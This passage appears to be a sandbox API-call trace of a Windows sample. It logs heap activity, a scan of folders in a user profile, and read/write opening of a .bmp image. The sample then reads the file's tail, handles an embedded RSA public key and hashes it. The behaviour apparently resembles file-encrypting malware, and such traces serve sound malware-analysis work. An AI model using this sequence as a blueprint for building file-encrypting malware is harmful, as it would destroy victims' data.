hHeap=0x2c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x3b7b950 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7b950 | out: hHeap=0x2c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3b15070 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.283] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.283] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3b15070 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b15070 | out: hHeap=0x2c0000) returned 1 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\") returned="security\\" [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6bc28 | out: hHeap=0x2c0000) returned 1 [0207.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321738 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef258 | out: hHeap=0x2c0000) returned 1 [0207.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x321738 | out: hHeap=0x2c0000) returned 1 [0207.284] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0207.284] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0207.284] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c2df0 | out: hHeap=0x2c0000) returned 1 [0207.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0207.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384580 | out: hHeap=0x2c0000) returned 1 [0207.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87688 [0207.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c38e8 | out: hHeap=0x2c0000) returned 1 [0207.285] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0207.285] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0207.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.285] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.285] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.285] PathFindFileNameW (pszPath="") returned="" [0207.285] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.285] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\security\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.286] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.286] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1e5aaf0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1e5aaf0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e5aaf0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0207.286] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.286] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.286] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0207.287] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeff8 [0207.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\") returned="tmp\\" [0207.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eeec8 [0207.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\") returned="Deployment\\" [0207.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321738 [0207.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\") returned="Java\\" [0207.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0207.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0207.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0207.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0207.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0207.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0207.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87688 [0207.287] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0207.287] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.288] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.288] PathFindFileNameW (pszPath="") returned="" [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0207.288] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\Java\\Deployment\\tmp\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.288] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.288] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 1 [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bb80 [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x214) returned 0x3b7c6a8 [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67078 [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67160 [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67c40 [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67b58 [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67a70 [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67418 [0207.288] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b676d0 [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b77d08 [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b77df0 [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b77ed8 [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b77fc0 [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b780a8 [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b78190 [0207.289] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa1dc2570, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xfaeead90, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xfaeead90, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="si", cAlternateFileName="")) returned 0 [0207.289] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0207.289] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b67d28 [0207.289] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b677b8 [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0207.289] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\1g-W_c2\\") returned="1g-W_c2\\" [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.289] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd0) returned 0x3292f90 [0207.290] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\") returned="PFhCel7TQAYtpink7jNG\\" [0207.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0207.290] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\") returned="hJg26t0YFz\\" [0207.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0207.290] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\") returned="941Y-ufnAszYHOsd\\" [0207.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x32c2df0 [0207.290] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\") returned="8522zzaC3XYMo_\\" [0207.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0207.290] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0207.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b87688 [0207.290] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0207.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.290] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0207.290] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0207.290] PathFindFileNameW (pszPath="") returned="" [0207.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xf0) returned 0x32b69d8 [0207.290] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\1g-W_c2\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94168d0, ftCreationTime.dwHighDateTime=0x1d5dbd8, ftLastAccessTime.dwLowDateTime=0x1d6a4400, ftLastAccessTime.dwHighDateTime=0x1d5dcc1, ftLastWriteTime.dwLowDateTime=0x1d6a4400, ftLastWriteTime.dwHighDateTime=0x1d5dcc1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0207.290] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf94168d0, ftCreationTime.dwHighDateTime=0x1d5dbd8, ftLastAccessTime.dwLowDateTime=0x1d6a4400, ftLastAccessTime.dwHighDateTime=0x1d5dcc1, ftLastWriteTime.dwLowDateTime=0x1d6a4400, ftLastWriteTime.dwHighDateTime=0x1d5dcc1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0207.290] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59cdc940, ftCreationTime.dwHighDateTime=0x1d5e274, ftLastAccessTime.dwLowDateTime=0xe63dd8d0, ftLastAccessTime.dwHighDateTime=0x1d5e651, ftLastWriteTime.dwLowDateTime=0xe63dd8d0, ftLastWriteTime.dwHighDateTime=0x1d5e651, nFileSizeHigh=0x0, nFileSizeLow=0x44d8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mj0rmewqojJ5SAim5W.bmp", cAlternateFileName="MJ0RME~1.BMP")) returned 1 [0207.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xe0) returned 0x3b677b8 [0207.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14e) returned 0x3294350 [0207.291] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\1g-W_c2\\mj0rmewqojJ5SAim5W.bmp") returned=".bmp" [0207.291] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\8522zzaC3XYMo_\\941Y-ufnAszYHOsd\\hJg26t0YFz\\PFhCel7TQAYtpink7jNG\\1g-W_c2\\mj0rmewqojJ5SAim5W.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\8522zzac3xymo_\\941y-ufnaszyhosd\\hjg26t0yfz\\pfhcel7tqaytpink7jng\\1g-w_c2\\mj0rmewqojj5saim5w.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0207.291] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=17624) returned 1 [0207.291] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0207.293] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x44b2, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0207.293] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0207.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0207.295] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x44d8, lpOverlapped=0x0) returned 1 [0207.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.296] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0207.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.296] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0207.296] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321738) returned 1 [0207.296] CryptCreateHash (in: hProv=0x321738, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0207.297] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0207.297] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0207.297] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0207.297] 